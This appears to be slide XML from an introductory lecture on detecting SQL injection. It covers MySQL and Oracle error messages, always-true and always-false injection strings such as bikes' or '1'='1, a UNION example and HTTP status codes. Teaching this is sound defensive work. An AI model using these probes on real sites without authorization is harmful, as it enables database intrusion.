              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error: Unknown column ‘attacker’ in ‘where clause’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Because the value is not enclosed between quotes MySQL treats it as a column name. The SQL statement executed was along these lines:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM products WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>idproduct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>MySQL cannot find a column name called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, and therefore returns an error.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The error is caught and then displayed using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>die()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> function which prints a message and exits the script. Other options are available, such as redirecting to another page:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if (!$result) { //If there is any error</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>header(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Location:http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>error.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”);}</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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GB" dirty="0"/>
              <a:t>Oracle Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="1066800"/>
            <a:ext cx="8839200" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A generic error when tampering with applications with Oracle backend databases is:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error: ORA-00933: SQL command not properly ended at …</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>It means you tried to execute a syntactically incorrect SQL statement. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The following error occurs when injecting a single quote:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error: ORA-01756: quoted string not properly terminated</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Another example of an error typically returned when an attacker manages to inject code into a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>subquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORA-00907: missing right parenthesis…</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT field1, field2, </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	(SELECT field1 FROM table2</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	WHERE something = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[attacker controlled variable]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	) as field3</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM table1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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8"/>
            <a:ext cx="8229600" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Application Response</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1143000"/>
            <a:ext cx="8686800" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>So far we saw the kinds of errors that applications display when the back-end database fails to execute a query. If you see one of those errors, you can be almost certain that the application is vulnerable to some kind of SQL injection. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>However, applications react differently when they receive an error from the database, and sometimes identifying SQL injection vulnerabilities is not as easy as previously shown. </a:t>
            </a:r>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GB" dirty="0"/>
              <a:t>Generic Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="990600"/>
            <a:ext cx="8534400" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If you are testing a Web site and discover that the application is always responding with a default or custom error page, you will need to make sure the error is due to SQL injection. You can test this by inserting meaningful SQL code into the parameter without triggering an application error.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In the preceding example, injecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> generates an error due to the extra single quote at the end:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM products WHERE category=‘attacker’’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>However, you can try to inject something that doesn’t generate an error. This is usually an educated trial-and-error process. In our example, we need to keep in mind that we are trying to inject data into a string enclosed with single quotes. For example, let’s try to inject  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bikes’ or ‘1’=’1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The resultant SQL statement would return all rows because it’s always true:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM products WHERE category=‘bikes’ OR ‘1’=‘1’</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8438"/>
            <a:ext cx="8229600" cy="715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Generic Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="990600"/>
            <a:ext cx="8229600" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In this example, we injected SQL code that created a meaningful correct query. If the application is vulnerable to SQL injection, the preceding query should return every row in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>products</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> table. This technique is very useful, as it introduces an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>always true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> condition.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>One of the disadvantages of this technique is that the result of the query will contain every single record in the table. If there are several thousand records, the query can take a long time to execute. One solution is to inject something that will have no effect on the final result; for example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>bikes’ or ‘1’=’2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM products WHERE category=‘bikes’ OR ‘1’=‘2’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Which is equivalent to:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM products WHERE category=‘bikes’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Because 1 is not equal to 2, and therefore the condition is false</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7038"/>
            <a:ext cx="8229600" cy="563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Generic Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="990600"/>
            <a:ext cx="8229600" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Another test to perform is the injection of an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>always false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> statement that generates no results. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bikes’ AND ‘1’=’2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM products</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE category=‘bikes’ AND ‘1’=‘2’ </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>However, keep in mind that things are not always as simple as shown here, and don’t be surprised if you inject an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>always false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> condition and the application returns results. This can be due to a number of reasons. For example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM products </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE category=‘bikes’ AND ‘1’=‘2’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION SELECT ∗</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new_products</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In this case the results of two queries are appended and returned as the result. What needs to be done here is to comment out the rest of the query.</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609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>HTTP Error Codes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1066800"/>
            <a:ext cx="8610600" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>There are two error codes that you need to familiarize yourself with to detect SQL injection vulnerabilities:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP 500 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(Internal Server Error): returned from a Web server when an error has been found when rendering the requested Web resource. In many scenarios, SQL errors are returned to the user in the form of HTTP 500 error codes. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP 302 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(Redirection): redirect to the home page or to a custom error page when errors are found. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The HTTP code returned is transparent to you unless you are using a proxy to catch the Web server response.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When you get one of these responses, that’s a good sign. It means that somehow you interfered with the normal behaviour of the application. The next step will be to craft a meaningful injection.</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1976" y="228600"/>
            <a:ext cx="8607425" cy="792162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0"/>
              <a:t>Understanding How Web Applications Work</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1679576" y="1066800"/>
            <a:ext cx="8836025" cy="3581400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>A database-driven Web application often has 3 or 4 tiers: </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
